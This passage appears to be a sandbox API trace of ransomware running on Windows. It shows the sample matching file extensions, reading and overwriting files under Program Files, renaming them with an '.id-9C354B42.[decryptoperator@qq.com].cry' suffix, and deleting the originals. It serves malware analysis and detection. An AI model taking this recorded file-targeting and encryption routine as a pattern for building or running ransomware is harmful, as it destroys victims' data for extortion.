lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.731] lstrlenW (lpString=".dbf") returned 4 [0038.731] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.731] lstrlenW (lpString=".1cd") returned 4 [0038.731] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.732] lstrlenW (lpString=".jpg") returned 4 [0038.732] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.732] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0038.732] lstrlenW (lpString="auxpad.xml") returned 10 [0038.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.733] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=212) returned 1 [0038.733] CloseHandle (hObject=0x1a0) returned 1 [0038.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20 [0038.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.733] lstrlenW (lpString=".doc") returned 4 [0038.733] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.733] lstrlenW (lpString=".docx") returned 5 [0038.733] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0038.733] lstrlenW (lpString=".pdf") returned 4 [0038.733] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.733] lstrlenW (lpString=".xls") returned 4 [0038.734] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.734] lstrlenW (lpString=".xlsx") returned 5 [0038.734] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0038.734] lstrlenW (lpString=".ppt") returned 4 [0038.734] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.734] lstrlenW (lpString=".zip") returned 4 [0038.734] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.734] lstrlenW (lpString=".rar") returned 4 [0038.734] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.734] lstrlenW (lpString=".bz2") returned 4 [0038.734] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.734] lstrlenW (lpString=".7z") returned 3 [0038.734] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.734] lstrlenW (lpString=".dbf") returned 4 [0038.734] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.734] lstrlenW (lpString=".1cd") returned 4 [0038.734] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.734] lstrlenW (lpString=".jpg") returned 4 [0038.734] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.734] lstrlenW (lpString=".doc") returned 4 [0038.734] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.735] lstrlenW (lpString=".docx") returned 5 [0038.735] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0038.735] lstrlenW (lpString=".pdf") returned 4 [0038.735] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.735] lstrlenW (lpString=".xls") returned 4 [0038.735] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.735] lstrlenW (lpString=".xlsx") returned 5 [0038.735] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0038.735] lstrlenW (lpString=".ppt") returned 4 [0038.735] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.735] lstrlenW (lpString=".zip") returned 4 [0038.735] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.735] lstrlenW (lpString=".rar") returned 4 [0038.735] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.735] lstrlenW (lpString=".bz2") returned 4 [0038.735] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.735] lstrlenW (lpString=".7z") returned 3 [0038.735] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.735] lstrlenW (lpString=".dbf") returned 4 [0038.735] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.735] lstrlenW (lpString=".1cd") returned 4 [0038.735] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.735] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0038.735] lstrlenW (lpString=".jpg") returned 4 [0038.735] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.736] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0038.736] lstrlenW (lpString="ea.xml") returned 6 [0038.736] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.736] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=384) returned 1 [0038.736] CloseHandle (hObject=0x1a0) returned 1 [0038.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0038.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.736] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0038.736] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0038.736] lstrlenW (lpString=".doc") returned 4 [0038.737] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.737] lstrlenW (lpString=".docx") returned 5 [0038.737] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0038.737] lstrlenW (lpString=".pdf") returned 4 [0038.737] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.737] lstrlenW (lpString=".xls") returned 4 [0038.737] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.737] lstrlenW (lpString=".xlsx") returned 5 [0038.737] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0038.737] lstrlenW (lpString=".ppt") returned 4 [0038.737] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0038.737] lstrlenW (lpString=".zip") returned 4 [0038.737] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.737] lstrlenW (lpString=".rar") returned 4 [0038.737] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.737] lstrlenW (lpString=".bz2") returned 4 [0038.737] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.737] lstrlenW (lpString=".7z") returned 3 [0038.737] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.737] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0038.737] lstrlenW (lpString=".dbf") returned 4 [0038.737] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.738] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0039.456] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0039.457] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0039.457] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0039.457] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0039.484] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0039.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0039.485] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fc6c | out: lpNewFilePointer=0x0) returned 1 [0039.485] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.485] ReadFile (in: hFile=0x184, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x315fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x315fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.501] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x315fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.501] ReadFile (in: hFile=0x184, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x315fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x315fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.540] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x315fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0039.540] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x315fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.540] ReadFile (in: hFile=0x184, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x315fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x315fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.561] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.561] WriteFile (in: hFile=0x184, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x315fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0039.834] SetEndOfFile (hFile=0x184) returned 1 [0039.835] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0039.842] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.843] WriteFile (in: hFile=0x184, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x315fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x315fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.844] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x315fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.844] WriteFile (in: hFile=0x184, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x315fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x315fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.846] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x315fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.846] WriteFile (in: hFile=0x184, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x315fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x315fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0039.847] CloseHandle (hObject=0x184) returned 1 [0039.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0039.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.941] lstrlenW (lpString=".doc") returned 4 [0039.941] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.941] lstrlenW (lpString=".docx") returned 5 [0039.942] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0039.942] lstrlenW (lpString=".pdf") returned 4 [0039.942] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString=".xls") returned 4 [0039.942] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString=".xlsx") returned 5 [0039.942] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0039.942] lstrlenW (lpString=".ppt") returned 4 [0039.942] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.942] lstrlenW (lpString=".zip") returned 4 [0039.942] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString=".rar") returned 4 [0039.942] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString=".bz2") returned 4 [0039.942] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.942] lstrlenW (lpString=".7z") returned 3 [0039.942] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.942] lstrlenW (lpString=".dbf") returned 4 [0039.942] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.942] lstrlenW (lpString=".1cd") returned 4 [0039.942] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.942] lstrlenW (lpString=".jpg") returned 4 [0039.942] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.942] lstrlenW (lpString=".doc") returned 4 [0039.942] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString=".docx") returned 5 [0039.942] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1 [0039.942] lstrlenW (lpString=".pdf") returned 4 [0039.942] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString=".xls") returned 4 [0039.942] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0039.942] lstrlenW (lpString=".xlsx") returned 5 [0039.943] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0039.943] lstrlenW (lpString=".ppt") returned 4 [0039.943] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0039.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.943] lstrlenW (lpString=".zip") returned 4 [0039.943] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0039.943] lstrlenW (lpString=".rar") returned 4 [0039.943] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0039.943] lstrlenW (lpString=".bz2") returned 4 [0039.943] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0039.943] lstrlenW (lpString=".7z") returned 3 [0039.943] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0039.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.943] lstrlenW (lpString=".dbf") returned 4 [0039.943] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0039.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.943] lstrlenW (lpString=".1cd") returned 4 [0039.943] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0039.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71 [0039.943] lstrlenW (lpString=".jpg") returned 4 [0039.943] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0039.943] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0039.943] lstrlenW (lpString="ExcelMUI.XML") returned 12 [0039.943] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0039.943] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1565) returned 1 [0039.944] CloseHandle (hObject=0x184) returned 1 [0039.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 0x20 [0039.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0040.069] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.069] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0040.101] GetLastError () returned 0x0 [0040.101] ReadFile (in: hFile=0x184, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x61d, lpOverlapped=0x0) returned 1 [0040.113] WriteFile (in: hFile=0x1ac, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x620, lpOverlapped=0x0) returned 1 [0040.114] ReadFile (in: hFile=0x184, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.114] WriteFile (in: hFile=0x1ac, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.114] SetEndOfFile (hFile=0x1ac) returned 1 [0040.114] CloseHandle (hObject=0x1ac) returned 1 [0040.115] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.115] SetEndOfFile (hFile=0x184) returned 1 [0040.116] CloseHandle (hObject=0x184) returned 1 [0040.116] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.116] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 1 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.117] lstrlenW (lpString=".doc") returned 4 [0040.117] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".docx") returned 5 [0040.117] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.117] lstrlenW (lpString=".pdf") returned 4 [0040.117] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".xls") returned 4 [0040.117] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.117] lstrlenW (lpString=".xlsx") returned 5 [0040.117] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned 